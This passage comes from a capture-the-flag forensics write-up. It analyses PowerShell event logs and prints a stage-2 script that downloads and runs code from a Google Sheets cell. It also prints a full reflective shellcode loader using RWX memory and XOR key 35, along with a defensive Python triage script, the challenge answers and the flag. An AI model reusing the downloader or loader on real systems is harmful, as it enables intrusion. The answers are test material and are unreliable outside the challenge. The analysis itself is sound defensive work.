<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">$url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU='));$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader(new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));$data = $sr.readtoend();$sr.close();$ms.close();$data|iex</Data>
<Data Name="ScriptBlockId">f1ad07f1-15f1-4992-a4da-3ffdc54c6077</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
The second 4104 event is the final stage that was retrieved from the spreadsheet: a classic reflective shellcode loader. It defines func_get_proc_address / func_get_delegate_type to resolve VirtualAlloc from kernel32.dll, allocates RWX memory (VirtualAlloc with protection 0x40, PAGE_EXECUTE_READWRITE), copies in the decoded bytes, and invokes them. Crucially, the shellcode is base64-decoded and then XOR-decrypted byte-by-byte with the key 35 (the -bxor 35 loop).
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}"></Provider>
<EventID Qualifiers="">4104</EventID>
<Version>1</Version>
<Level>3</Level>
<Task>2</Task>
<Opcode>15</Opcode>
<Keywords>0x0000000000000000</Keywords>
<TimeCreated SystemTime="2023-07-05 10:57:24.761370"></TimeCreated>
<EventRecordID>79</EventRecordID>
<Correlation ActivityID="{0da93c0a-af83-0004-ba44-a90d83afd901}" RelatedActivityID=""></Correlation>
<Execution ProcessID="5700" ThreadID="5240"></Execution>
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>UNZ-RESEARCH-WS01</Computer>
<Security UserID="S-1-5-21-2954173937-1834019889-2190886044-1002"></Security>
</System>
<EventData><Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}
function func_get_delegate_type {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
[Parameter(Position = 1)] [Type] $var_return_type = [Void]
)
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')
return $var_type_builder.CreateType()
}
[Byte[]]$var_code = [System.Convert]::FromBase64String('<base64 shellcode blob omitted>')
for ($x = 0; $x -lt $var_code.Count; $x++) {
$var_code[$x] = $var_code[$x] -bxor 35
}
$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)
$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
</Data>
<Data Name="ScriptBlockId">a161d800-a564-40a3-aad8-4f9e02e966f7</Data>
<Data Name="Path"></Data>
</EventData>
</Event>
The -bxor 35 operation confirms the XOR key used to decrypt the shellcode is 35.
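The two 4104 records above, together with the base64 URL decoding from the Decoding the Stage-2 URL section, can be handled by one small triage script. This is an added example written for this writeup, not part of the challenge files or of evtx_dump.py; the function names (iter_events, decode_base64_literals, parse_sheets_url, find_xor_key, triage) are my own, the indicator list is my choice, and SAMPLE_XML is constructed in the shape of the dumped records, reusing the record-78 script block from this page and abbreviated stand-ins for the other two records.

```python
"""Triage of PowerShell script-block records (Event ID 4104) in an XML dump.

Added example for this writeup, not part of the challenge files. It keeps the
4104 records, decodes FromBase64String('...') literals, recognises a Google
Sheets API v4 URL (spreadsheet ID and the ranges= cell), reads the -bxor key
and flags the loader indicators discussed above. SAMPLE_XML is constructed:
record 78 reuses the stage-2 downloader text from this page, the other two
records are abbreviated stand-ins (the 'AAAA' blob is a dummy, not shellcode).
"""
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlparse

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Strings whose presence in a single script block merits analyst attention.
INDICATORS = {
    "FromBase64String": re.compile(r"frombase64string", re.I),
    "Invoke-Expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "Invoke-RestMethod": re.compile(r"invoke-restmethod|invoke-webrequest", re.I),
    "DeflateStream": re.compile(r"deflatestream|gzipstream", re.I),
    "XOR loop": re.compile(r"-bxor\s+\d+", re.I),
    "VirtualAlloc": re.compile(r"virtualalloc", re.I),
    "Delegate for function pointer": re.compile(r"getdelegateforfunctionpointer", re.I),
}
B64_CALL = re.compile(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'\s*\)", re.I)
# A dump may carry per-file XML declarations and <Events> wrappers; drop them and re-wrap.
WRAPPER = re.compile(r"<\?xml[^>]*\?>|</?Events>")


def iter_events(xml_text):
    """Yield (event_id, record_id, script_block_text_or_None) for every <Event>."""
    root = ET.fromstring("<Events>" + WRAPPER.sub("", xml_text) + "</Events>")
    for ev in root.iter(EVT_NS + "Event"):
        system = ev.find(EVT_NS + "System")
        event_id = int(system.findtext(EVT_NS + "EventID"))
        record_id = int(system.findtext(EVT_NS + "EventRecordID"))
        script = None
        for data in ev.iter(EVT_NS + "Data"):
            if data.get("Name") == "ScriptBlockText":
                script = data.text or ""
        yield event_id, record_id, script


def decode_base64_literals(script):
    """Decode every FromBase64String('...') literal that yields printable text."""
    out = []
    for blob in B64_CALL.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # binary payloads (e.g. shellcode) are not reported as text
        if text.isprintable():
            out.append(text)
    return out


def parse_sheets_url(url):
    """Return (spreadsheet_id, sheet_name, cell) for a Sheets API v4 URL, else None."""
    u = urlparse(url)
    m = re.fullmatch(r"/v4/spreadsheets/([A-Za-z0-9_-]+)", u.path)
    if u.hostname != "sheets.googleapis.com" or not m:
        return None
    sheet, _, cell = parse_qs(u.query).get("ranges", [""])[0].partition("!")
    return m.group(1), sheet, cell


def find_xor_key(script):
    """Return the integer operand of the first '-bxor N', or None."""
    m = re.search(r"-bxor\s+(\d+)", script, re.I)
    return int(m.group(1)) if m else None


def triage(xml_text):
    """Summarise every 4104 record: indicator hits, Sheets URLs found, XOR key."""
    findings = []
    for event_id, record_id, script in iter_events(xml_text):
        if event_id != 4104 or script is None:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        sheets = [s for s in map(parse_sheets_url, decode_base64_literals(script)) if s]
        findings.append({"record": record_id, "indicators": hits,
                         "sheets": sheets, "xor_key": find_xor_key(script)})
    return findings


def _event(event_id, record_id, data_name, text):
    # Constructed record in the (trimmed) shape evtx_dump.py emits for this channel.
    return (f'<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System>'
            f'<Provider Name="Microsoft-Windows-PowerShell"></Provider>'
            f'<EventID Qualifiers="">{event_id}</EventID><EventRecordID>{record_id}</EventRecordID>'
            f'<Channel>Microsoft-Windows-PowerShell/Operational</Channel></System>'
            f'<EventData><Data Name="{data_name}">{text}</Data></EventData></Event>\n')


# Base64 URL literal exactly as recorded in event record 78 on this page.
SHEET_BLOB = "aHR0cHM6Ly9zaGVldHMuZ29vZ2xlYXBpcy5jb20vdjQvc3ByZWFkc2hlZXRzLzFIcEI0R3FxWXdJNlg3MXo0cDJFSzg4Rm9KanJzVzJES2JTa3gtcm81bFFRP2tleT1BSXphU3lEVXBqU2Y3UjFsMWRRb2hBNVF2OUVkeVdBM0tCT01jMFUmcmFuZ2VzPVNoZWV0MSFPMzcmaW5jbHVkZUdyaWREYXRhPXRydWU="
STAGE2_TEXT = (
    "$url = [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('" + SHEET_BLOB + "'));"
    "$resp = invoke-restmethod -uri $url;$payload = $resp.sheets[0].data[0].rowData[0].values[0].formattedValue;"
    "$decode = [system.convert]::frombase64string($payload);$ms = new-object system.io.memorystream;"
    "$ms.write($decode,0, $decode.length);$ms.position =0;$sr = new-object system.io.streamreader("
    "new-object system.io.compression.deflatestream($ms, [system.io.compression.compressionmode]::decompress));"
    "$data = $sr.readtoend();$sr.close();$ms.close();$data|iex")
LOADER_EXCERPT = ("[Byte[]]$var_code = [System.Convert]::FromBase64String('AAAA')\n"
                  "for ($x = 0; $x -lt $var_code.Count; $x++) { $var_code[$x] = $var_code[$x] -bxor 35 }\n"
                  "$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer("
                  "(func_get_proc_address kernel32.dll VirtualAlloc), $delegate_type)")
SAMPLE_XML = (_event(4103, 77, "Payload", "CommandInvocation(Invoke-RestMethod)")
              + _event(4104, 78, "ScriptBlockText", STAGE2_TEXT)
              + _event(4104, 79, "ScriptBlockText", LOADER_EXCERPT))

if __name__ == "__main__":
    for finding in triage(SAMPLE_XML):
        print(finding)
```

Run against decoded.xml instead of SAMPLE_XML, the same triage() call reports record 78 with the Sheets URL decoded to the spreadsheet ID 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ and cell Sheet1!O37, and record 79 with the VirtualAlloc/delegate indicators and XOR key 35; the 4103 record is skipped because only 4104 carries ScriptBlockText. Two caveats: the base64 regex only catches quoted literals, not a blob built up from variables, and a script block split across several MessageNumber fragments must be reassembled by ScriptBlockId before the indicators are evaluated.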
Answering the Questions and Capturing the Flag
With the full chain reconstructed, we connect to the challenge service and answer each forensic question.
nc 83.136.251.168 35441
The service walks through each finding. The program copied and renamed is cscript.exe to calc.exe; the VBS deobfuscation function is LLdunAaXwVgKfowf; the next-stage executor is powershell.exe; the spreadsheet ID is 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ; the payload lives in Sheet1:O37; the relevant PowerShell event ID is 4104; and the shellcode XOR key is 35.
What program is being copied, renamed, and what is the final name? (Eg: notepad.exe:picture.jpeg)
> cscript.exe:calc.exe
[+] Correct!
What is the name of the function that is used for deobfuscating the strings, in the VBS script? (Eg: funcName)
> LLdunAaXwVgKfowf
[+] Correct!
What program is used for executing the next stage? (Eg: notepad.exe)
> powershell.exe
[+] Correct!
What is the Spreadsheet ID the malicious actor downloads the next stage from? (Eg: U3ByZWFkU2hlZXQgSUQK)
> 1HpB4GqqYwI6X71z4p2EK88FoJjrsW2DKbSkx-ro5lQQ
[+] Correct!
What is the Sheet Name and Cell Number that houses the payload? (Eg: Sheet1:A1)
> Sheet1:O37
[+] Correct!
What is the Event ID that relates to Powershell execution? (Eg: 5991)
> 4104
[+] Correct!
In the final payload, what is the XOR Key used to decrypt the shellcode? (Eg: 1337)
> 35
[+] Correct!
[+] Here is the flag: HTB{GSH33ts_4nd_str4ng3_f0rmula3_byp4ss1ng_f1r3w4lls!!}
The flag is HTB{GSH33ts_4nd_str4ng3_f0rmula3_byp4ss1ng_f1r3w4lls!!}.